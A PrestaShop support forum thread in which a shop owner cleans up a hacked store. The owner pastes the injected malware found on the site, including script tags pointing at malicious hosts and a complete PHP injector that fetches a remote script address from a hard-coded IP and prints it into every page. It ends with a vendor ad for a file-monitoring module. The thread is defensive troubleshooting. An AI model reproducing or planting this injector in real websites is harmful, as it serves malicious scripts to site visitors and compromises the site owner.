Help! Prestashop Malware/Virus

[AZC]

I think my prestashop has been messed up by malware or a virus. There is random text at the top of the page,I get an error in my modules page and When loading my site it loads all sorts of weird sites before. You can find it at azcoweb.com/web1/prestashop
Any help is appreciated

Edited April 10, 2014 by AZC (see edit history)

[Dh42]

Do you have a link to the site?

[AZC]

http://azcoweb.com/web1/prestashop/

[loulou66]

Hi

 

edit file theme/yourtheme/header.tpl

 

sheach '); /*/5ca518*/ and delete it

 

are you sur you dont do any change ? or add a module ?

 

i see you have a lot of errors JS  and http://mtfujiinn.com/httpsecure/.........  if its your webhoster verif in your panel.

 

@++

 

Loulou66

[AZC]

Hi

 

edit file theme/yourtheme/header.tpl

 

sheach '); /*/5ca518*/ and delete it

 

are you sur you dont do any change ? or add a module ?

 

i see you have a lot of errors JS  and http://mtfujiinn.com/httpsecure/.........  if its your webhoster verif in your panel.

 

@++

 

Loulou66

Thanks Loulou,

I did try to upload a theme but it didnt work and this is what happened afterwards.

In my header.tpl i have a line which says

</div><!--5ca518--><script type="text/javascript" src="http://powerfulzibe.net/QtfzjxWc.php?id="></script><!--/5ca518-->

no idea where it came from.

in my history it says all my files have been changed recently?

I host with GoDaddy so what is mtfujiinn??

[loulou66]

HI

 

yep its little advertising hack i think

http://mtfujiinn.com/ it s restaurant in nebraska :lol

 

contact Godaddy and ask why your the security let pass this advertising (withe screen of some files changed / date of change)

and check all files or make backup of your server if Goddady have backup option ftp

 

@++

 

Loulou66

[AZC]

Loulou I changed the header.tpl by overwriting with a clean version, the text still shows up at the top of the page!

DH42 any help?

Edited April 9, 2014 by AZC (see edit history)

[AZC]

I've found the following line in the source via my browser

<script type="text/javascript" src="http://manske-werl.de.dd11326.kasserver.com/typo3/wWkNrZyc.php?id="></script>

but i cant work out how to change it.

[AZC]

Ok. This is the latest screenshot of my page. I've manually trawled the files and removed all the extra code i can find, but it doesn't seem to be enough.

 

I don't want to reinstall everything as it is an edited theme and i have made changes. However i have reinstalled all the files that i did not touch.

 

If anyone can help or needs more details i'm quite desperate.

Thanks

[benjamin utterback]

Hey Aryeh,

 

   Okay so, here is some information about the malicious url, https://www.virustotal.com/en-gb/url/b5a1859f61e6e6c3b3109d510d87033b3e4e1ad966220e866ec4914f6d481da2/analysis/

 

I don't know how many changes you have made on your template. A new install would definitely be an option. You can copy the changes to the new store.

[AZC]

I also found and removed this from almost every page

 

#5ca518#

if (empty($rb)) {

    error_reporting(0);

    @ini_set('display_errors', 0);

    if (!function_exists('__url_get_contents')) {

        function __url_get_contents($remote_url, $timeout)

        {

            if (function_exists('curl_exec')) {

                $ch = curl_init();

                curl_setopt($ch, CURLOPT_URL, $remote_url);

                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

                curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds

                $_url_get_contents_data = curl_exec($ch);

                curl_close($ch);

            } elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {

                $ctx = @stream_context_create(array('http' =>

                    array(

                        'timeout' => $timeout,

                    )

                ));

                $_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);

            } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {

                $handle = @fopen($remote_url, "r");

                $_url_get_contents_data = @stream_get_contents($handle);

            } else {

                $_url_get_contents_data = __file_get_url_contents($remote_url);

            }

            return $_url_get_contents_data;

        }

    }

    if (!function_exists('__file_get_url_contents')) {

        function __file_get_url_contents($remote_url)

        {

            if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',

                $remote_url, $matches)

            ) {

                $protocol = strtolower($matches[1]);

                $host = $matches[2];

                $path = $matches[3];

            } else {

                // Bad remote_url-format

                return FALSE;

            }

            if ($protocol == "http") {

                $socket = @fsockopen($host, 80, $errno, $errstr, $timeout);

            } else {

                // Bad protocol

                return FALSE;

            }

            if (!$socket) {

                // Error creating socket

                return FALSE;

            }

            $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";

            $len_written = @fwrite($socket, $request);

            if ($len_written === FALSE || $len_written != strlen($request)) {

                // Error sending request

                return FALSE;

            }

            $response = "";

            while (!@feof($socket) &&

                ($buf = @fread($socket, 4096)) !== FALSE) {

                $response .= $buf;

            }

            if ($buf === FALSE) {

                // Error reading response

                return FALSE;

            }

            $end_of_header = strpos($response, "\r\n\r\n");

            return substr($response, $end_of_header + 4);

        }

    }

    if (empty($__var_to_echo) && empty($remote_domain)) {

        $rb = "http://46.244.10.234/b2.php";

        $rb = __url_get_contents($rb, 1);

            $__var_to_echo = '<script type="text/javascript" src="' . $rb . '?id="></script>';

            echo $__var_to_echo;

        }

    }

}

#/5ca518#

[AZC]

I have done a new upload of almost all the files and i've been through the ones that ive changed and compared them to the original files. I cant find any problems with them but it doesn't seem to help.

[AZC]

UPDATE!!!

 

Found this

http://www.prestashop.com/forums/topic/229371-recover-after-intrusion/

 

It worked like a dream! Now i just need to work out how it happened in the first place

 

Thanks everyone

[musicmaster]

A hopefully superfluous question: did you change the passwords both for your ftp account and your shop?

[AZC]

Yes, that was the first thing I did.

I reckon the problem was a theme i tried to upload. It didn't seem to work at the time, and then I started getting these problems.

A lesson to always check everything and trust no one

Thanks

[El Patron]

Our FileStasis Attack Surface Monitor(ASM) + Restore for PrestaShop module will 1) build vault of mission critical files 2) monitor and report when file changes/additions/deletions are found, allows you to commit trusted change to vault or restore untrusted change from vault.

The most important part of detecting hack is knowing which files changed, that is the purpose of this module.

https://prestaheroes.com/products/prestavault-malware-trojan-virus-protection?variant=40653346635983

 

Edited May 17 by PrestaHeroes USA (see edit history)